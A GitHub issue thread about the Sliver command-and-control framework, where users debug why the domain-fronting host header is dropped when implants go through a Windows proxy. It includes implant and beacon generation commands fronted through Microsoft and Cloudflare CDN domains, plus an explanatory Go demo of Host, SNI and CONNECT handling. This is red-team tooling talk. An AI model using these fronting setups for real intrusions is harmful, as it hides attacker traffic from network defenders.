BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0

changing host header does not work #1707

Open MaorSabag opened 2 weeks ago

MaorSabag commented 2 weeks ago

Describe the bug: I have a Front Door set up on Azure for domain fronting (for example: frontdoor.azureedge.net). When generating an http/s payload and setting the host-header to the Azure domain, it does not get set when the payload is executed.

To Reproduce: Steps to reproduce the behavior:

  1. Generate an http/s payload: generate --http ajax.microsoft.com/api?driver=wininet&host-header=frontdoor.azureedge.net --skip-symbols
  2. Execute the payload (Windows platform)
  3. View the https traffic using a proxy tool
  4. The host header is not set 🥲

Expected behavior: the Host header should be frontdoor.azureedge.net, with the domain being ajax.microsoft.com.

Screenshots: The request sent from the payload: (screenshot)

Working request to the Azure Front Door by setting the host header manually: (screenshot)


Additional context: Even tried to change the code manually (even though I'm so sure about it) and set req.Host = "frontdoor.azureedge.net", but it had no effect on the request. (screenshot)

navaneeth-dev commented 1 week ago

Just tried to replicate it; everything is working fine. Maybe try generating with -d and post the logs of the client?

MaorSabag commented 6 days ago

Screenshot with the -d option: (screenshot)

navaneeth-dev commented 6 days ago

Oh I did not use wininet driver, can you try without that?

MaorSabag commented 6 days ago

Got a few insights 😅 Without the driver parameter set but with a proxy set on the Windows host, I got the same results: (screenshot)

Without the driver parameter set and without a proxy set on the Windows host, I got a successful result: (screenshot)

Seems like a bug. I'm dealing with an organization proxy, so the proxy options should be included if I want to use my Front Door.

navaneeth-dev commented 4 days ago

Yes, seems like a bug. I don't have the time right now, but maybe others can look into it.

https://github.com/BishopFox/sliver/blob/3051de7a6152bf699f277a2aa71ba2d6c0a2d52b/implant/sliver/proxy/provider_windows.go#L287

I don't see any references to WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY, which should detect the proxy automatically. But I am not too sure.
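The thread above narrows the problem to the proxy path (no proxy: Host header set; Windows proxy configured: Host header missing). Before digging into Sliver's Windows proxy provider, the check a practitioner would want is what stock Go net/http does with a fronted request on each path, since that is the baseline the implant is built on. The program below is an added example for this page, not Sliver's code and not a reproduction of the wininet driver or the Windows proxy provider, so it does not establish the cause of the bug. It uses the hostnames from the issue only as strings (nothing is sent to them), and stands up two constructed local doubles: an httptest TLS server playing the CDN edge, which echoes back the Host header it received, and a loopback CONNECT tunnel playing the organisation proxy. It shows three things: the Host header is taken from req.Host (not from req.Header); for plain http:// through a forward proxy, net/http builds the absolute request-URI from req.Host, so the proxy is told to reach the fronted name rather than the edge, which is why fronting through a proxy only makes sense over https://; and for https:// the CONNECT target and TLS SNI come from the URL while the edge still sees the fronted Host inside the tunnel.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"log"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
	"time"
)

// frontedRequest targets rawURL (the CDN edge) but sets req.Host, which is where net/http takes the Host header from.
func frontedRequest(rawURL, frontHost string) (*http.Request, error) {
	req, err := http.NewRequest(http.MethodGet, rawURL, nil)
	if err == nil {
		req.Host = frontHost // a value put in req.Header["Host"] would be ignored
	}
	return req, err
}

// wireFormat serialises req as it goes on the socket: origin-form directly, absolute-form (WriteProxy) to a plain HTTP proxy.
func wireFormat(req *http.Request, viaProxy bool) (string, error) {
	var b strings.Builder
	write := req.Write
	if viaProxy {
		write = req.WriteProxy
	}
	err := write(&b)
	return b.String(), err
}

// connectProxy is a minimal CONNECT tunnel (a constructed stand-in for an organisation proxy): it sees only the CONNECT target, never the Host header inside TLS.
func connectProxy(ln net.Listener) {
	for {
		c, err := ln.Accept()
		if err != nil {
			return
		}
		go func(c net.Conn) {
			defer c.Close()
			br := bufio.NewReader(c)
			req, err := http.ReadRequest(br)
			if err != nil || req.Method != http.MethodConnect {
				return
			}
			up, err := net.DialTimeout("tcp", req.Host, 5*time.Second)
			if err != nil {
				return
			}
			defer up.Close()
			io.WriteString(c, "HTTP/1.1 200 Connection established\r\n\r\n")
			go io.Copy(up, br)
			io.Copy(c, up) // ends when the edge closes its side
		}(c)
	}
}

// tunnelDemo runs a TLS edge that echoes the Host header it received plus a loopback CONNECT proxy, sends a fronted request through the proxy and returns what the edge saw.
func tunnelDemo(frontHost string) (string, error) {
	edge := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { fmt.Fprint(w, r.Host) }))
	defer edge.Close()
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return "", err
	}
	defer ln.Close()
	go connectProxy(ln)
	tlsConf := edge.Client().Transport.(*http.Transport).TLSClientConfig // trusts the httptest certificate
	tr := &http.Transport{Proxy: http.ProxyURL(&url.URL{Scheme: "http", Host: ln.Addr().String()}), TLSClientConfig: tlsConf}
	client := &http.Client{Timeout: 5 * time.Second, Transport: tr}
	defer client.CloseIdleConnections()
	req, err := frontedRequest(edge.URL, frontHost) // CONNECT target and SNI come from edge.URL; only Host carries frontHost
	if err != nil {
		return "", err
	}
	resp, err := client.Do(req)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return string(body), err
}

func main() {
	seen, err := tunnelDemo("frontdoor.azureedge.net")
	if err != nil {
		log.Fatal(err)
	}
	req, _ := frontedRequest("http://ajax.microsoft.com/api", "frontdoor.azureedge.net") // constant, valid URL
	direct, _ := wireFormat(req, false)
	proxied, _ := wireFormat(req, true)
	fmt.Printf("direct:\n%svia plain HTTP proxy:\n%sHost seen by TLS edge through CONNECT: %s\n", direct, proxied, seen)
}
```

Run it with go run; it needs no network beyond loopback. The direct form starts with "GET /api HTTP/1.1" followed by "Host: frontdoor.azureedge.net", while the forward-proxy form starts with "GET http://frontdoor.azureedge.net/api HTTP/1.1", so a plain HTTP proxy would never contact ajax.microsoft.com at all. Through the CONNECT tunnel the TLS edge reports "frontdoor.azureedge.net", which is the behaviour the issue expects for an https listener; if an implant build loses the header only when a proxy is configured, the place to look is the code that replaces this stock transport path, not net/http itself.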

markuta commented 17 hours ago

I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the driver=wininet parameter when generating a beacon, e.g.:

generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev  --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe

heyquentin commented 15 hours ago

> I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the driver=wininet parameter when generating a beacon, e.g.:
>
> generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev  --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe

Do you have any ideas on how I'd do this using CloudFront?